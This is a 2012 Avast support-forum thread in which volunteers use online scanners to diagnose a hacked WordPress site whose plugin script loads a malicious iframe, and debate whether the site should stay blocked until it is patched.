Author Topic: Web Shield - blocked trojan - js:scriptdc-inf [trj]?  (Read 8543 times)

0 Members and 1 Guest are viewing this topic.

mlapage

  • Guest
Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« on: January 20, 2012, 12:18:08 AM »
I have a website wxw.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike
« Last Edit: January 20, 2012, 06:33:10 AM by Milos »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
« Last Edit: January 20, 2012, 03:00:00 AM by Pondus »

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #2 on: January 20, 2012, 02:41:41 AM »
@ Pondus

When clicking your URL for -www.msolarpro.com results by Sucuri, Avast gives an alert for a  blocked trojan. Check it out.

Sucuri - INFECTED   -http://sitecheck.sucuri.net/results/www.msolarpro.com

Regards.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #3 on: January 20, 2012, 02:45:23 AM »
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results. As presumably the example of the actual script, document .  write gives the web shield a fit.

So you will have to break the link.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

nsm0220

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #4 on: January 20, 2012, 03:04:16 AM »
I have a website www.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike

btw its does have a Trojan in it i went to the link and gdata found the Trojan so the site haves a Trojan in it

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #6 on: January 20, 2012, 03:20:03 AM »
@ DavidR

I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat ! It realy gave me a scare. First time though. Hope I am safe. What do you think it happened ?

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #7 on: January 20, 2012, 03:27:34 AM »
avast shield reacted on the code displayed at Sucuri   ;)


it also happens here in the forum if somone poste code that avast detect


see attached screenshot
« Last Edit: January 20, 2012, 03:30:00 AM by Pondus »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #8 on: January 20, 2012, 03:41:17 AM »
@ DavidR

I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat ! It realy gave me a scare. First time though. Hope I am safe. What do you think it happened ?

I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

This happens when you are using some analysis sites that give more information on what is found is a copy of what is on the site. I have a number of exclusions for some analysis sites.

It is just that in the past sucuri didn't display the page link to the results so we had to post an image of the information. Now that it does those visiting the results page could well get a shock.

So I think it is back to images.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #9 on: January 20, 2012, 04:04:08 AM »
OK.

I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

I got it now. Your UK English messes my US English learned as a second language. Thanks.

Back to mlapage. Sorry guy for the momentary hijacking.
« Last Edit: January 20, 2012, 04:14:43 AM by iroc9555 »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #10 on: January 20, 2012, 12:56:38 PM »
Norman lab
Quote
Files:
-www.msolarpro.com.htm : Clean!
l10n.js : Clean!

These are the clean files, but we do get 'iframe' of 'brunno.cz.cc' but this is a inactive link now. so marking as a clean.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #11 on: January 20, 2012, 01:42:30 PM »
The norman attitude is strange to me as the site in itself has been hacked (wordpress files, don't know if it is an old vulnerable version being exploited). Regardless if the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #12 on: January 21, 2012, 12:35:22 AM »
Well this is flagged as supicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis
of mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
     status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
     info: [decodingLevel=0] found JavaScript
Avast webshield flags  -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second op: http://forum.avast.com/index.php?action=printpage;topic=83287.0  where a false positive was found....and the IP also had an instance of HTML/Redirector.MA on it (now dead),
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/   (detection from Bitdefender, but TrafficLight does not list it)

Now we can finally come to the point why the avast webshield blocks this, re: http://wepawet.iseclab.org/view.php?hash=be10484672ca0c3fdf9004f67f05cc13&t=1327101730&type=js

The iFrame source found there: -http://brunno.cz.cc  
has malcious activity, found here, see:
http://google.com/safebrowsing/diagnostic?site=brunno.cz.cc/&hl=ru-RU  
brunno.cz.cc  this site has infected 76 domains as we read there
via -/showthread.php?t=37220338 on it!

We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis, Yes, I repeat this again - the avast webshield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool,

polonus
« Last Edit: January 21, 2012, 01:23:21 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #13 on: January 21, 2012, 01:21:37 AM »
@DavidR,

I think the avast point of vieuw is the right one here. As long as the website code stays exploitable, software is not fully patched, reinfection stays an imminent threat.
As long as the webclient can no longer be infected, we could conclude the block could be lifted.

So norman says malcode no longer up or responding, site safe to be visited by user.
This attitude towards the issue is rounding the bends by a mile, so to say.

Better is to lift website blocking when the website is secure for both user and website owner/ website hoster/ webmaster. The software code has been fully patched, exploit code cleansed, all measures have been taken to prevent re-infection. One such an action which could be that easy as no longer giving away the full server software version, etc.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

mlapage

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #14 on: January 21, 2012, 05:27:12 PM »
I thank you all for the help you have provided. I read the replies, however I did not understand all of what was discussed. Does '/sitecheck.sucuri.net/results/' clean the infected code or just inform to the infection?
Where does my wesite stand at this time-as far as avast program is concerned?

Thanks again,

Mike